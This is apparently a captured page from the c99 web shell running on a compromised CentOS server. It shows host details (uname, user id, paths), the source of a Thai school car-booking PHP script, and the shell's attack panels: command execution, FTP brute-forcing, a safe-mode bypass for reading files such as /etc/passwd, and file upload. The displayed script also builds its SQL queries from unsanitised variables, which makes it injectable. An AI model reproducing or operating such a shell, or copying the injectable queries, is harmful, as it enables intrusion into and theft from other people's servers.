!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Carcalendar.php (8.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
    
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../include/Function.php" );
        require_once( 
"../include/FunctionDB.php" );
        require_once( 
"../calendar/check.php" );
          require_once( 
"../calendar/cal_func.php" );
        
/**  Create Database Object  */
        
$dbObj = new DBConn;

        
//=== SESSION
        
$Username $valid_user
        
        
        
/**  Config Table for This Page  */
        
$myTable1 "personal_tb";
        
$myTable2 "formcaroffice";
        
$myTable3 "province";
        
$myTable4 "training_tb";
        
        
                
        
/**  Table  -->  tech_plan_tb  */
        
$query1 " SELECT *  FROM $myTable2  WHERE   DateCar= '$now_stamp'   ";
        
$result1 $dbObj->execQuery($query1);
        
$rs1 $dbObj->fetchArray($result1);
        
$numrows $dbObj->_numrows;
            
//$Teacher_code = $rss['Teacher_code'];
        /**  Table  -->  techplan_method_tb  */
          
$query2 " SELECT *  FROM $myTable3   WHERE   ProvinceId='$rs1[ProvinceId]'     ";
          
$result2 $dbObj->execQuery($query2);
           
$rs2 $dbObj->fetchArray($result2);
        
        
        

 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - แก้ไขข้อมูลแผนการสอน</title>
</head>

<table width="547" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="547" align="center" valign="top" style="padding:10px 0px 5px 10px; font-weight: bold;"><fieldset>
      <table width="507" height="274"  border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#0000FF">
        <tr>
          <td width="496" height="32" align="left" bgcolor="#FFFFFF">ปฏิทินการจองรถยนต์  &nbsp;&nbsp; &nbsp;  &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;วันที่ <? echo dateThai($now_stamp); ?></td>
        </tr>
        <tr>
          <td height="242" align="center"><?php do {  ?>
            <table width="99%"  border="0" align="center" cellpadding="1" cellspacing="2">
              <tr bgcolor="#CCCCCC">
                <td width="100%" height="18" colspan="2" align="left" bgcolor="#FFFFFF">รถยนต์คันที่ <?php echo ++$i;?>
                  <?
                
              $sql 
"Select * From   automobile_tb   Where CarmoId ='$rs1[CarmoId]' ";
              
$result2 mysql_query($sql) or die("Error".mysql_error());
              
$rs2 mysql_fetch_array($result2);
          echo 
"$rs2[CodeNo]";?></td>
              </tr>
              <tr bgcolor="#CCCCCC">
                <td height="18" colspan="2" align="left" bgcolor="#FFFFFF"><?php echo  $rs1['CarNo'];?></td>
              </tr>
              <tr>
                <td colspan="2">ไปราชการที่
                  <input name="makeWord" type="text" id="makeWord" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="40"  value="<?=$rs1["makeWord"]; ?>"/>
                  </font> ผู้ร่วมเดินทาง
                  <input name="Make" type="text" id="Make" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="1" value="<? echo $rs1["Make"]; ?>" />
                  คน</a></td>
              </tr>
              <tr>
                <td colspan="2">จังหวัด
                  <input name="ProvinceId" type="text" id="ProvinceId" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="20"  value=" <?php 
       $query2 
" SELECT *  FROM $myTable3   WHERE  provinceId='$rs1[provinceId]'     ";
                 
$result2 $dbObj->execQuery($query2);
                
$rs2 $dbObj->fetchArray($result2);
                      echo 
$rs2[provinceName];
    
?>" /></td>
              </tr>
              <tr>
                <td colspan="2">เพื่อ</a>
                  <input name="MakePer2" type="text" id="MakePer2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="70" value="<? echo $rs1["Training_name"]; ?>"/></td>
              </tr>
              <tr>
                <td colspan="2">หมายเหตุ
                  <input name="Detail2" type="text" id="Detail2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<? echo $rs1["Detail"]; ?>" size="60" /></td>
              </tr>
              <tr>
                <td colspan="2">ในวันที่
                  <input name="Date_start2" type="text" id="Date_start2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="15"  value=" <?php 
       $sday 
$rs1[Date_start];
    
$yearthai explode("-",$sday);
    
$day =      intval($yearthai[2]);
    
$month =  intval($yearthai[1]);
    
$year =     intval($yearthai[0]+543);     
          
//////////////////
 //   $yearthai =  $day ;
  
$m getThaiSubMonth($month);
     echo
"$day"." "."$m"." "."$year";
    
?>" />
                  &nbsp;&nbsp;&nbsp;ถึงวันที่&nbsp;
                  <input name="Date_finish2" type="text" id="Date_finish2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="15"  value=" <?php 
       $sday 
$rs1[Date_finish];
    
$yearthai explode("-",$sday);
    
$day =      intval($yearthai[2]);
    
$month =  intval($yearthai[1]);
    
$year =     intval($yearthai[0]+543);     
          
//////////////////
 //   $yearthai =  $day ;
  
$m getThaiSubMonth($month);
     echo
"$day"." "."$m"." "."$year";
    
?>" />
                  เวลา
                  <input name="Personly2" type="text" id="Personly4" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs1['Time_start'];?> - <?=$rs1['Time_finish'];?>" size="10"   onkeypress="checkNumeric()"   />
                  </font></td>
              </tr>
              <tr>
                <td colspan="2"> รถยนต์
                  <input name="CarmoId" type="text" id="CarmoId2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?
                
              $sql 
"Select * From   automobile_tb   Where CarmoId ='$rs1[CarmoId]' ";
              
$result2 mysql_query($sql) or die("Error".mysql_error());
              
$rs2 mysql_fetch_array($result2);
          echo 
"$rs2[Acc_name]&nbsp;ยี่ห้อ&nbsp; $rs2[Kind]&nbsp;ทะเบียน&nbsp;$rs2[CodeNo]";?>" size="60"     /></td>
              </tr>
              <tr>
                <td colspan="2">พนักงานขับรถ
                  <input name="name2" type="text" id="name2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?
                $name1  
$rs1["name1"];
              
$sql "Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code ='$name1'";
              
$result3 mysql_query($sql) or die("Error".mysql_error());
             
$rs3 mysql_fetch_array($result3);
          echo 
"$rs3[First_name] $rs3[Teacher_name]&nbsp;&nbsp;$rs3[Teacher_lastname]";?>" size="30"     /></td>
              </tr>
              <tr>
                <td colspan="2" align="left">ผู้ขอใช้:
                  <?php
               
               $query 
"Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId  WHERE  Teacher_code='$rs1[Teacher_code]' ";
              
$result $dbObj->execQuery($query);
            
$rss $dbObj->fetchArray($result); ?>
                  <? echo $rss[First_name]?> <? echo $rss[Teacher_name]?>&nbsp;<? echo $rss[Teacher_lastname]?></td>
              </tr>
              <tr>
                <td colspan="2" align="left">สถานะการขอใช้รถยนต์ :
                  <?php if($rs1["Status"] == "อนุมัติ" ) echo 'อนุมัติ'?>
                  <?php if($rs1["Status"] == "ไม่อนุมัติ" ) echo 'ไม่อนุมัติ'?>
                  <?php if($rs1["Status"] == "รออนุมัติ" ) echo 'รออนุมัติ'?></td>
              </tr>
              <tr>
                <td colspan="2"><hr /></td>
              </tr>
            </table>
            <?php } while ($rs1 $dbObj->fetchArray($result1)); ?>
            จำนวน <?php echo $numrows ?> รายการ</a></td>
        </tr>
      </table>
    </fieldset></td>
  </tr>
</table>

  <?php
    
/**  Free Resource */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0069 ]--